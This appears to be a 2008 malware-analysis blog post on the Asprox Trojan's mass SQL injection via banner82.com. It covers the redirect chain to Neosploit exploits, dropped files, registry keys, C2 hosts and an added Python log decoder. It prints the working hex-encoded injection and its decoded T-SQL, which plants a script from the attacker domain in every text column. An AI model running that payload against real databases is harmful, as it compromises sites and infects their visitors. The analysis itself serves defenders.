Monday, May 19, 2008

Asprox Trojan and banner82.com

On May 19, 2008 Dancho Danchev discussed fast-fluxing SQL injections, this time involving the domain banner82.com. The banner82.com SQL injection attacks are similar to the previous direct84.com injections, but there are some slight differences.

SQL Injection Attack:

DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461655F437572736F72 AS VARCHAR(4000));EXEC(@S);--


Decodes to:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''<script src=http: //www[dot]banner82[dot]com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Tae_Cursor

The user-agent for the injection was: Mozilla/4.0 (compatible; MSIE 7.0;Windows NT 5.1; .NET CLR 2.0.50727)
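As an added illustration (not code from the original post), the following Python decodes the CAST(0x...) hex blob out of a web-server log line back into the T-SQL shown above and flags the traits of this cursor-driven mass UPDATE. The hex is the one captured above; the surrounding log line is constructed, and the NVARCHAR/UTF-16LE branch generalizes to the later Asprox waves that used that form of the cast.

```python
import re
from urllib.parse import unquote

# Hex blob from the banner82.com request captured above, split into chunks for readability.
BANNER82_HEX = (
    "4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C41524520"
    "5461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D20"
    "7379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420"
    "612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220"
    "622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F7220"
    "4645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20"
    "455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D29292B2727"
    "3C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E2727272920"
    "4645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461655F437572736F72"
)

# Constructed W3C-style log line (not from the post): the payload URL-encoded in the query field.
SAMPLE_LOG_LINE = (
    "2008-05-19 03:12:44 GET /news.asp id=12;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + BANNER82_HEX
    + "%20AS%20VARCHAR(4000));EXEC(@S);-- 200"
)

# VARCHAR casts carry single-byte text; the NVARCHAR form used by later Asprox waves is UTF-16LE.
CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR\(\d+\)\)", re.IGNORECASE)
SCRIPT_SRC_RE = re.compile(r"<script\s+src=([^>\s]+)\s*>", re.IGNORECASE)


def decode_cast_payloads(log_line: str) -> list:
    """Return the T-SQL hidden inside every CAST(0x... AS [N]VARCHAR(n)) found in a log line."""
    text = unquote(log_line)
    decoded = []
    for hexblob, is_nvarchar in CAST_RE.findall(text):
        codec = "utf-16-le" if is_nvarchar else "latin-1"
        decoded.append(bytes.fromhex(hexblob).decode(codec, errors="replace"))
    return decoded


def triage(sql: str) -> dict:
    """Flag the traits of a cursor-driven mass UPDATE and extract the script URL it plants."""
    upper = sql.upper()
    return {
        # Enumerates every user table (xtype='u') and its text columns, then rewrites each one.
        "mass_update": all(k in upper for k in ("SYSOBJECTS", "SYSCOLUMNS", "CURSOR", "UPDATE")),
        "injected_urls": SCRIPT_SRC_RE.findall(sql),
    }
```

Running `triage` over the decoded output gives the planted URL, which is the string to search for in the database's text columns when cleaning up.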

Banner82.com Domain
As reported by Danchev, the domain uses fast-flux technology (double-flux) with a rotating pool of proxy peer and DNS IP addresses. A small sample of the rotating addresses was captured during analysis.


Banner82.com Site
The b.js file may redirect to malicious code at a variety of locations. A sample analysis revealed the following redirect chain.

injected script: http: //www[dot]banner82[dot]com/b.js

b.js returned an iframe redirect to: http: //banner82[dot]com/cgi-bin/index.cgi?ad

http: //banner82[dot]com/cgi-bin/index.cgi?ad returned a location redirect to: http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?inbox

http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?inbox returned two layers of obfuscated code (callee.toString() + location.href)

The result is a script redirect to http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?ad75d33b00000258007e11f339060000000002e547d1afff02656e2d75730000000000

(the string characters vary with each connection)

Two more layers of obfuscated code (callee.toString() + location.href) reveal Neosploit-generated exploit code targeted at the following vulnerabilities:

MDAC RDS.Dataspace ActiveX control vulnerability (CVE-2006-0003)
AOL SB.SuperBuddy.1 ActiveX Control Remote Code Execution Vulnerability (CVE-2006-5820)
GOM Player GOM Manager ActiveX Control Buffer Overflow (CVE-2007-5779)
CA Products DSM ListCtrl ActiveX Control Code Execution Vulnerability (CVE-2008-1472)
Apple Quicktime HREFTrack Cross-Zone Scripting vulnerability (CVE-2007-0059)
Heap-based buffer overflow in DirectAnimation.PathControl COM object (CVE-2006-4446)

The payload was a request for the binary file: http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?ad75d33b00000258027e11f339060000000002e547d1e60002040900000000020

Malware Analysis:
The payload was saved as "index".

Filename: (index.exe) – long string of characters
MD5: 60b9fbb8ba14171cd5d3d1fd86ddd564
Size: 48.0 KB (49,152 bytes)

The malware made the following connections to retrieve common.bin (spam instructions) and cmdexe.bin (the SQL injection tool msscntr32.exe).

POST /forum.php HTTP/1.1
Host: 66[dot]199[dot]241[dot]98

POST /forum_asp.php HTTP/1.1
Host: 66[dot]197[dot]168[dot]5

The "index" malware searches for installations of CuteFTP and WS_FTP. The following files were created:

C:\WINDOWS\System32\aspimgr.exe Trojan.Asprox (Symantec)
C:\WINDOWS\s32.txt
C:\WINDOWS\System32\msscntr32.exe

Filename: aspimgr.exe
MD5: bb0c22f33cbf8be8a264e96ef6895ce4
Size: 72.0 KB (73,728 bytes)

Filename: msscntr32.exe
MD5: 30afb898ba27e925f41eab9e68b62833
Size: 20.0 KB (20,480 bytes)

The following registry keys were created:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sft "(Default)"
Type: REG_SZ
Data: {056B8C51-1B27-4D61-81CA-66EA278842B7}

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "DisplayName"
Type: REG_SZ
Data: Microsoft ASPI Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\aspimgr.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_ASPIMGR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "DisplayName"
Type: REG_SZ
Data: Microsoft Security Center Extension
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\msscntr32.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_MSSCENTER\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00


The malware aspimgr.exe makes the following connections and sets up an HTTP server on port 80.

* Connects to "ns.uk2.net" on port 53 (IP)
* Connects to "www.yahoo.com" on port 80 (IP)
* Connects to "www.web.de" on port 80 (IP)

The Asprox malware generated phishing emails related to "NatWest OnLine Banking".